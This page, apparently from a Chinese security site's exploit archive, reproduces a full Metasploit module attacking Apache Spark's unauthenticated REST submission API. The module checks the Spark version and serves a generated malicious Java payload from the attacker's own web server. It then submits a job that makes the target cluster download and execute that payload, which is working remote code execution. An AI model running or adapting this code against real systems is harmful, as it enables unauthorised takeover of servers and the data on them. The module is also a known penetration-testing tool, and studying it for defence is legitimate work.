首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Spark - Unauthenticated Command Execution (Metasploit)
来源:metasploit.com 作者:Green-m 发布时间:2018-12-03  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Spark Unauthenticated Command Execution',
      'Description'    => %q{
          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'aRe00t',                            # Proof of concept
          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'https://www.jianshu.com/p/a080cb323832'],
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
        ],
      'Platform'       => 'java',
      'Arch'           => [ARCH_JAVA],
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 12 2017',
      'DefaultTarget'  => 0,
      'Notes'          =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Stability'   => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION]
        }
    ))
 
    register_options [
      Opt::RPORT(6066),
      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
    ]
 
  end
 
  def check
    return CheckCode::Detected if get_version
    CheckCode::Unknown
  end
 
  def primer
    path = service.resources.keys[0]
    binding_ip = srvhost_addr
 
    proto = datastore['SSL'] ? 'https' : 'http'
    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"
 
    send_payload(payload_uri)
  end
 
  def exploit
    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
 
    vprint_status("Generating payload ...")
    @pl = generate_payload.encoded_jar(random:true)
    print_error("Failed to generate the payload.") unless @pl
 
    print_status("Starting up our web service ...")
    Timeout.timeout(datastore['HTTPDELAY']) { super }
  rescue Timeout::Error
  end
 
  def get_version
    @version = nil
 
    res = send_request_cgi(
      'uri'           => normalize_uri(target_uri.path),
      'method'        => 'GET'
    )
 
    unless res
      vprint_bad("#{peer} - No response. ")
      return false
    end
 
    if res.code == 401
      print_bad("#{peer} - Authentication required.")
      return false
    end
 
    unless res.code == 400
      return false
    end
 
    res_json = res.get_json_document
    @version = res_json['serverSparkVersion']
 
    if @version.nil?
      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")
      return false
    end
 
    true
  end
 
  def send_payload(payload_uri)
    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)
 
    data =
    {
      "action"                    => "CreateSubmissionRequest",
      "clientSparkVersion"        => @version.to_s,
      "appArgs"                   => [],
      "appResource"               => payload_uri.to_s,
      "environmentVariables"      => {"SPARK_ENV_LOADED" => "1"},
      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",
      "sparkProperties"           =>
      {
        "spark.jars"              => payload_uri.to_s,
        "spark.driver.supervise"  => "false",
        "spark.app.name"          => rand_appname.to_s,
        "spark.eventLog.enabled"  => "true",
        "spark.submit.deployMode" => "cluster",
        "spark.master"            => "spark://#{rhost}:#{rport}"
      }
    }
 
    res = send_request_cgi(
      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),
      'method'        => 'POST',
      'ctype'         => 'application/json;charset=UTF-8',
      'data'          => data.to_json
    )
 
  end
 
  # Handle incoming requests
  def on_request_uri(cli, request)
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    send_response(cli, @pl)
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·VBScript - 'rtFilter' Out-of-B
·Joomla JCE 2.6.33 Arbitrary Fi
·VBScript - 'OLEAUT32!VariantCl
·xorg-x11-server < 1.20.3 - 'mo
·HTML5 Video Player 1.2.5 - Buf
·Linux Kernel 4.8 (Ubuntu 16.04
·Schneider Electric PLC - Sessi
·knc (Kerberized NetCat) Denial
·WebKit JSC - BytecodeGenerator
·WebKit JIT - 'ByteCodeParser::
·WebKit JSC JIT - 'JSPropertyNa
·Unitrends Enterprise Backup bp
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved